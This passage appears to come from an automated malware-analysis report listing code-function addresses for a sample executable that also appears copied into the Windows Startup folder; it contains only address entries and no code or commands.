Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F487950	0_2_00007FF78F487950
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F491880	0_2_00007FF78F491880
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F49E01C	0_2_00007FF78F49E01C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4920A0	0_2_00007FF78F4920A0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F495F30	0_2_00007FF78F495F30
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A471C	0_2_00007FF78F4A471C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F481F50	0_2_00007FF78F481F50
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A9FF8	0_2_00007FF78F4A9FF8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F488FD0	0_2_00007FF78F488FD0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F491E94	0_2_00007FF78F491E94
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4936E0	0_2_00007FF78F4936E0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A1EE4	0_2_00007FF78F4A1EE4
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4986D0	0_2_00007FF78F4986D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A6D70	0_2_00007FF78F4A6D70
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F492D50	0_2_00007FF78F492D50
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A65EC	0_2_00007FF78F4A65EC
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F491C90	0_2_00007FF78F491C90
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F49A430	0_2_00007FF78F49A430
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F49E4B0	0_2_00007FF78F49E4B0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497C98	0_2_00007FF78F497C98
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F49EB30	0_2_00007FF78F49EB30
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A0F38	0_2_00007FF78F4A0F38
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A4280	0_2_00007FF78F4A4280
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F491A84	0_2_00007FF78F491A84
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F493AE4	0_2_00007FF78F493AE4
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4922A4	0_2_00007FF78F4922A4
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA4612F0	2_2_00007FFBAA4612F0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA4618A0	2_2_00007FFBAA4618A0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA599AB0	2_2_00007FFBAA599AB0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA602BB0	2_2_00007FFBAA602BB0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5FB060	2_2_00007FFBAA5FB060
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA599060	2_2_00007FFBAA599060
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5A1630	2_2_00007FFBAA5A1630
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA615B00	2_2_00007FFBAA615B00
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5BBB91	2_2_00007FFBAA5BBB91
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5C6B40	2_2_00007FFBAA5C6B40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA583BC0	2_2_00007FFBAA583BC0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5C3BA0	2_2_00007FFBAA5C3BA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA589C80	2_2_00007FFBAA589C80
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA58FC70	2_2_00007FFBAA58FC70
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA62E8E0	2_2_00007FFBAA62E8E0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5F58A0	2_2_00007FFBAA5F58A0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5A3980	2_2_00007FFBAA5A3980
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5CE990	2_2_00007FFBAA5CE990
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5B5960	2_2_00007FFBAA5B5960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA58A940	2_2_00007FFBAA58A940
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5F099B	2_2_00007FFBAA5F099B
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5E5A40	2_2_00007FFBAA5E5A40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA615EF0	2_2_00007FFBAA615EF0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA597F60	2_2_00007FFBAA597F60
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5C9010	2_2_00007FFBAA5C9010
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5ACFE0	2_2_00007FFBAA5ACFE0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA629FE0	2_2_00007FFBAA629FE0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA59BFA0	2_2_00007FFBAA59BFA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5DEFB0	2_2_00007FFBAA5DEFB0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA591060	2_2_00007FFBAA591060
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA587030	2_2_00007FFBAA587030
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5A8CB0	2_2_00007FFBAA5A8CB0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5D9D80	2_2_00007FFBAA5D9D80
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA61FD80	2_2_00007FFBAA61FD80
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA59CDE0	2_2_00007FFBAA59CDE0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5CDDA0	2_2_00007FFBAA5CDDA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA58BDA0	2_2_00007FFBAA58BDA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5EAE70	2_2_00007FFBAA5EAE70
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5A62F0	2_2_00007FFBAA5A62F0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5A72D0	2_2_00007FFBAA5A72D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA624330	2_2_00007FFBAA624330
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5E33B0	2_2_00007FFBAA5E33B0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5DA490	2_2_00007FFBAA5DA490
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA593490	2_2_00007FFBAA593490
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5EA110	2_2_00007FFBAA5EA110
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6410E0	2_2_00007FFBAA6410E0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6320B0	2_2_00007FFBAA6320B0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5840B0	2_2_00007FFBAA5840B0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5E11D0	2_2_00007FFBAA5E11D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA61A280	2_2_00007FFBAA61A280
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA583295	2_2_00007FFBAA583295
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5966F0	2_2_00007FFBAA5966F0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6276C0	2_2_00007FFBAA6276C0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5B0790	2_2_00007FFBAA5B0790
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA624750	2_2_00007FFBAA624750
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA59C800	2_2_00007FFBAA59C800
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5847C0	2_2_00007FFBAA5847C0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5877C4	2_2_00007FFBAA5877C4
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5AD7C0	2_2_00007FFBAA5AD7C0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5CF7D0	2_2_00007FFBAA5CF7D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6227A0	2_2_00007FFBAA6227A0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA62C870	2_2_00007FFBAA62C870
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA58282E	2_2_00007FFBAA58282E
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA584510	2_2_00007FFBAA584510
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5AE4D0	2_2_00007FFBAA5AE4D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5874B1	2_2_00007FFBAA5874B1
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5F2580	2_2_00007FFBAA5F2580
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5C4590	2_2_00007FFBAA5C4590
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5DB530	2_2_00007FFBAA5DB530
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA5AC530	2_2_00007FFBAA5AC530
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6235D0	2_2_00007FFBAA6235D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6285B0	2_2_00007FFBAA6285B0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA589640	2_2_00007FFBAA589640
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB3E1FD0	2_2_00007FFBAB3E1FD0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB3E2430	2_2_00007FFBAB3E2430
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB5F45D0	2_2_00007FFBAB5F45D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB5F4820	2_2_00007FFBAB5F4820
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB601D80	2_2_00007FFBAB601D80
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB601FF0	2_2_00007FFBAB601FF0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6029C0	2_2_00007FFBAB6029C0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB602EC0	2_2_00007FFBAB602EC0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB603550	2_2_00007FFBAB603550
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6024A0	2_2_00007FFBAB6024A0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB612110	2_2_00007FFBAB612110
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB611D40	2_2_00007FFBAB611D40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB621F10	2_2_00007FFBAB621F10
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6221C0	2_2_00007FFBAB6221C0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB641FA0	2_2_00007FFBAB641FA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB652050	2_2_00007FFBAB652050
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB651F40	2_2_00007FFBAB651F40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6622D0	2_2_00007FFBAB6622D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB661D40	2_2_00007FFBAB661D40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB672160	2_2_00007FFBAB672160
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB682070	2_2_00007FFBAB682070
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6AC480	2_2_00007FFBAB6AC480
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6B0980	2_2_00007FFBAB6B0980
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6D7BA0	2_2_00007FFBAB6D7BA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6D7F79	2_2_00007FFBAB6D7F79
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB755770	2_2_00007FFBAB755770
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB71149C	2_2_00007FFBAB71149C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7124D7	2_2_00007FFBAB7124D7
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB71117C	2_2_00007FFBAB71117C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711618	2_2_00007FFBAB711618
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7126FD	2_2_00007FFBAB7126FD
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB712612	2_2_00007FFBAB712612
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7117F8	2_2_00007FFBAB7117F8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7113DE	2_2_00007FFBAB7113DE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693472BC	9_2_00007FF7693472BC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769327950	9_2_00007FF769327950
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769346370	9_2_00007FF769346370
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C	9_2_00007FF769337E4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769344280	9_2_00007FF769344280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769331A84	9_2_00007FF769331A84
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769340F38	9_2_00007FF769340F38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769333AE4	9_2_00007FF769333AE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693322A4	9_2_00007FF7693322A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769331C90	9_2_00007FF769331C90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76933A430	9_2_00007FF76933A430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337C98	9_2_00007FF769337C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76933E4B0	9_2_00007FF76933E4B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76933EB30	9_2_00007FF76933EB30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769331E94	9_2_00007FF769331E94
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693336E0	9_2_00007FF7693336E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769341EE4	9_2_00007FF769341EE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693386D0	9_2_00007FF7693386D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769346D70	9_2_00007FF769346D70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769332D50	9_2_00007FF769332D50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693465EC	9_2_00007FF7693465EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769331880	9_2_00007FF769331880
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76933E01C	9_2_00007FF76933E01C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693320A0	9_2_00007FF7693320A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C	9_2_00007FF769337E4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76934471C	9_2_00007FF76934471C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769335F30	9_2_00007FF769335F30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769340F38	9_2_00007FF769340F38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769321F50	9_2_00007FF769321F50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769349FF8	9_2_00007FF769349FF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769328FD0	9_2_00007FF769328FD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBA8CA12F0	10_2_00007FFBA8CA12F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBA8CA18A0	10_2_00007FFBA8CA18A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA291FD0	10_2_00007FFBAA291FD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA292430	10_2_00007FFBAA292430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2A45D0	10_2_00007FFBAA2A45D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2A4820	10_2_00007FFBAA2A4820
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C9AB0	10_2_00007FFBAA2C9AB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA332BB0	10_2_00007FFBAA332BB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA32B060	10_2_00007FFBAA32B060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C9060	10_2_00007FFBAA2C9060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2D1630	10_2_00007FFBAA2D1630
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA345B00	10_2_00007FFBAA345B00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2F6B40	10_2_00007FFBAA2F6B40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2EBB91	10_2_00007FFBAA2EBB91
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B3BC0	10_2_00007FFBAA2B3BC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2F3BA0	10_2_00007FFBAA2F3BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B9C80	10_2_00007FFBAA2B9C80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2BFC70	10_2_00007FFBAA2BFC70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA35E8E0	10_2_00007FFBAA35E8E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3258A0	10_2_00007FFBAA3258A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2BA940	10_2_00007FFBAA2BA940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2FE990	10_2_00007FFBAA2FE990
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2D3980	10_2_00007FFBAA2D3980
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2E5960	10_2_00007FFBAA2E5960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA32099B	10_2_00007FFBAA32099B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA315A40	10_2_00007FFBAA315A40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA345EF0	10_2_00007FFBAA345EF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C7F60	10_2_00007FFBAA2C7F60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA359FE0	10_2_00007FFBAA359FE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2CBFA0	10_2_00007FFBAA2CBFA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2F9010	10_2_00007FFBAA2F9010
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA30EFB0	10_2_00007FFBAA30EFB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2DCFE0	10_2_00007FFBAA2DCFE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B7030	10_2_00007FFBAA2B7030
